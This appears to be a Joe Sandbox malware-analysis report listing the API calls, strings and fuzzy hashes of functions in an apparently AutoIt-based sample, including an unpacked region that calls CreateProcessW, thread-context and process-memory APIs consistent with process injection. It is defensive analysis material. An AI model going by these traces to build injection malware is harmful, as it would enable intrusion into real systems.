Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 45f64c252ac0d92576c49bb062be99f85fccf1844b545812fe7b2a36e4114589
Instruction ID: ea3e6aba5d9e219bbb2e7aeee471fce2015e96d5152dd06e34e01b60007f3185
Opcode Fuzzy Hash: 45f64c252ac0d92576c49bb062be99f85fccf1844b545812fe7b2a36e4114589
Instruction Fuzzy Hash: 11F0223492030D7BDB00BAA4DC86EAE7B6D6E01310F604135FA14825D3EFB2EA36CD80

Function 00253017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0025302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00253044

Strings

aut, xrefs: 00253038

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 81e901b88160d142ec5499d4ebc4b5508689ceeb9c36b38e8be7472ce8a7f62f
Instruction ID: 759788918ec8daf6b5c21eb9aff527ad330a4e41d14e41fc96fa74be768634b3
Opcode Fuzzy Hash: 81e901b88160d142ec5499d4ebc4b5508689ceeb9c36b38e8be7472ce8a7f62f
Instruction Fuzzy Hash: B6D05E7250032867DB20A7A4AC0EFCB3A6CDB05750F0002A1BA59E2092DEB09A84CBD0

Function 00267F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002682F5
TerminateProcess.KERNEL32(00000000), ref: 002682FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 002684DD

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: ea7a61eaa3e7686585fde915060f8ffe10ecd4f0cabd367eebea8c344cfcb541
Instruction ID: e9c8a8606d32f9f562217493d400fa5e102e0bb95bdfed252795898a711c02a2
Opcode Fuzzy Hash: ea7a61eaa3e7686585fde915060f8ffe10ecd4f0cabd367eebea8c344cfcb541
Instruction Fuzzy Hash: 03127C719183419FC714DF28C484B2ABBE5BF88318F148A5DE8998B352DB71ED85CF92

Function 00215AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfe6dcb0072b9647e288120c44ae3d696fcd88ca414076064c0ac99f8e33769f
Instruction ID: 59a41f77cdf59cbe87647cb854b9263e10f4ed7db42362b9ac4a34d2d7fccb3f
Opcode Fuzzy Hash: cfe6dcb0072b9647e288120c44ae3d696fcd88ca414076064c0ac99f8e33769f
Instruction Fuzzy Hash: 6151F871D3462ADFCB209FA4C945FEE7BF4AFA5314F14009AF405A7291D7708AA18BA1

Function 001E10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001E1BF4
Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 001E1BFC
Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001E1C07
Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001E1C12
Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 001E1C1A
Part of subcall function 001E1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 001E1C22

Part of subcall function 001E1B4A: RegisterWindowMessageW.USER32(00000004,?,001E12C4), ref: 001E1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001E136A
OleInitialize.OLE32 ref: 001E1388
CloseHandle.KERNEL32(00000000,00000000), ref: 002224AB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 375bacdf9ad05c93a154a21f2dfc3c39c7c1f7a72699c672b10ade90d18f4e55
Instruction ID: c342acb58dc9d9d0b5bc74cd97f62c9c9e2b805757f8252ad56e75b8791a1ce9
Opcode Fuzzy Hash: 375bacdf9ad05c93a154a21f2dfc3c39c7c1f7a72699c672b10ade90d18f4e55
Instruction Fuzzy Hash: B7719DB49216408ED3A4DF7ABC6D6A93BE4FB983843E4832ED50AC7261EB305475CF51

Function 001E54C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 001E556D
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 001E557D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 64311f9da43d5890a70b70e12758a6a558c84b4573e3fd9d392bd705de5b97a9
Instruction ID: 8e4ecd00cebf27c0668fbbe600c0e77209ddf99b5f058cd944b2170c4f83991f
Opcode Fuzzy Hash: 64311f9da43d5890a70b70e12758a6a558c84b4573e3fd9d392bd705de5b97a9
Instruction Fuzzy Hash: 9B314B71A00A49EFDB14CF69D880B9DB7B6FF48318F148629E91997240D771FE94CB90

Function 0024C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001E3A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0024C259
KillTimer.USER32(?,00000001,?,?), ref: 0024C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0024C270

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 9d17c21bd8ffa3fa978ba1bc57522d03201d4cb27b59c6f43099439cbd4610e4
Instruction ID: afbf88e16003e0680c80cf692d533557f165a5702745c0514e46042af3277130
Opcode Fuzzy Hash: 9d17c21bd8ffa3fa978ba1bc57522d03201d4cb27b59c6f43099439cbd4610e4
Instruction Fuzzy Hash: A131E570915344AFEB66CF789859BE7BBECAB02308F10009ED6DEA3241C7F45A84CB51

Function 002186AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,002185CC,?,002A8CC8,0000000C), ref: 00218704
GetLastError.KERNEL32(?,002185CC,?,002A8CC8,0000000C), ref: 0021870E
__dosmaperr.LIBCMT ref: 00218739

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: b8f4a94216b413673609c00bdfd8b3a9cacd0fdac31106591755b9af3e92e7ae
Instruction ID: 1790c2930664d18586f9e3fb93540f1c5ef6fd7e00972f67640cd9febdef0d3e
Opcode Fuzzy Hash: b8f4a94216b413673609c00bdfd8b3a9cacd0fdac31106591755b9af3e92e7ae
Instruction Fuzzy Hash: 91016B32A342B456D260663468C97FE67CD4BF1774F38029AF8188B1D2DEA0CCD28550

Function 001EDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 001EDB7B
DispatchMessageW.USER32(?), ref: 001EDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EDB9F
Sleep.KERNEL32(0000000A), ref: 001EDBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00231CC9

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 7d7e0cc5a72e3956a15ca166e84b622f1196e464b32a09fe3679e8fc45b95384
Instruction ID: 464fd1aba7fa6f0ab823f12abc25ac61ae1501ed1844f12fc9778af03da58556
Opcode Fuzzy Hash: 7d7e0cc5a72e3956a15ca166e84b622f1196e464b32a09fe3679e8fc45b95384
Instruction Fuzzy Hash: 9FF05E306043819BE734CBB1EC99FEA73ACEB45310F604A19E60A830D0EB309498CB26

Function 00252FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00252CD4,?,?,?,00000004,00000001), ref: 00252FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00252CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00253006
CloseHandle.KERNEL32(00000000,?,00252CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0025300D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: be066f903d37948507699f8e15567e1ad391e5e961df41762321b7eb34cf96fe
Instruction ID: 7b2caad6eabc777dadfa7cc7576ad15b6c99665c11f0b4d489afd5057c484a14
Opcode Fuzzy Hash: be066f903d37948507699f8e15567e1ad391e5e961df41762321b7eb34cf96fe
Instruction Fuzzy Hash: 26E0863268131077E2302765BC0DF8B3A1CD786B71F204264FB1D750D046A0154182A8

Function 001F1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001F17F6

Strings

CALL, xrefs: 001F17C6

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 39cb07d047ac00383786d6710edd991b28c4e4839065d13afec68869b70d913b
Instruction ID: ad8118f0d504e2c847239998ef359e4569f0ede00a46bcb7463b9690b5e4547a
Opcode Fuzzy Hash: 39cb07d047ac00383786d6710edd991b28c4e4839065d13afec68869b70d913b
Instruction Fuzzy Hash: A522ABB0608305EFC714DF14C494A3ABBF5BF99314F24896DF68A8B262D771E855CB82

Function 00256EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00256F6B

Part of subcall function 001E4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00256F5A, 00256F63

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 70ae2a7f4f4523ccec701c4529ef6beb3fecf23645e5d1b693b64039d0700117
Instruction ID: 973f22a3a749c4ceec02469b39b7e4aae646a1ec0813747f78aefdc7e1b4abb6
Opcode Fuzzy Hash: 70ae2a7f4f4523ccec701c4529ef6beb3fecf23645e5d1b693b64039d0700117
Instruction Fuzzy Hash: FBB1A131118B418FCB14EF25D891D6EB7E5BFA4304F54885DF896872A2EB30ED49CB92

Function 00252557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00252587

Strings

EA06, xrefs: 002525B9

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: e5690cda55b869fff7167b8cf62b53ad0ff396ce7db775043e5241e802f185c8
Instruction ID: 32560bf59a261aa3e5f13e6004c413e35be375485714f45d4fb26a2fcbab31a5
Opcode Fuzzy Hash: e5690cda55b869fff7167b8cf62b53ad0ff396ce7db775043e5241e802f185c8
Instruction Fuzzy Hash: 6D01B572914258BEDF28C7A8C856EAEBBF89B06311F04455AF552D21C2E5B4E6188B60

Function 001E3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 001E3908

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 29e79227bb7d64f33aa0b8d715e279059ad17523f3912c0e5c46f45e7baa0b98
Instruction ID: 69a6935c9f8c9d37771731ec41f94d9b1981e489a64eab6d59e4472d0ce186b4
Opcode Fuzzy Hash: 29e79227bb7d64f33aa0b8d715e279059ad17523f3912c0e5c46f45e7baa0b98
Instruction Fuzzy Hash: 4531D570504741DFD320DF25E898B9BBBF4FB49708F000A6EF6A983240E771AA54CB52

Function 001E5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,001E949C,?,00008000), ref: 001E5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,001E949C,?,00008000), ref: 00224052

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c0b892bb68ab4694223d6b23c4b60515087f768eea055b1314d19079f24ecf02
Instruction ID: 730e3fcc96d3c713b726f3238bfd27e2052171a5a0f5d918a9f239b61aaca89f
Opcode Fuzzy Hash: c0b892bb68ab4694223d6b23c4b60515087f768eea055b1314d19079f24ecf02
Instruction Fuzzy Hash: C9019230545625B6E3341A6ADC0EF9B7F99EF027B4F108310BA9C5A1E0C7B458A4CB90

Function 001E6E14 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,001E9879,?,?,?), ref: 001E6E33
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,001E9879,?,?,?), ref: 001E6E69

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 4f7b84d34da9fdb5b3f5c889084bbcaf2eaf0c6591cd0c72be3cdcb65ca635e8
Instruction ID: e9cd410f01693a0f98acef9200fb6f0591527a22c711efdada64ce7683c9f692
Opcode Fuzzy Hash: 4f7b84d34da9fdb5b3f5c889084bbcaf2eaf0c6591cd0c72be3cdcb65ca635e8
Instruction Fuzzy Hash: BC01F7713042047FEB18A77AEC0BF7F7AADDF85350F14003DB10ADA1E1EAA0AC004620

Function 00D660AD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00D6686B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D66901
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D66923

Memory Dump Source

Source File: 00000000.00000002.2345689506.0000000000D64000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D64000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d64000_smQoKNkwB7.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction ID: cdf5fae7407eda308834a77cdf694942af055d8daa1bf9117fc8092004afd6ac
Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction Fuzzy Hash: 6B12CE24E14658C7EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A8F81CB5A

Function 001FFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 001FFD1F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 4ef22cd313604e80a20dc4dbd86981595b604f2d88a642bd1940a0f6757f604b
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 0E311374A0010DDBD718CF99D480969FBA1FF49300B2982A9EA09CB656D771EDC2DBC0

Function 001E4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 001E4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E9C
Part of subcall function 001E4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001E4EAE
Part of subcall function 001E4E90: FreeLibrary.KERNEL32(00000000,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4EFD

Part of subcall function 001E4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E62
Part of subcall function 001E4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001E4E74
Part of subcall function 001E4E59: FreeLibrary.KERNEL32(00000000,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E87

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
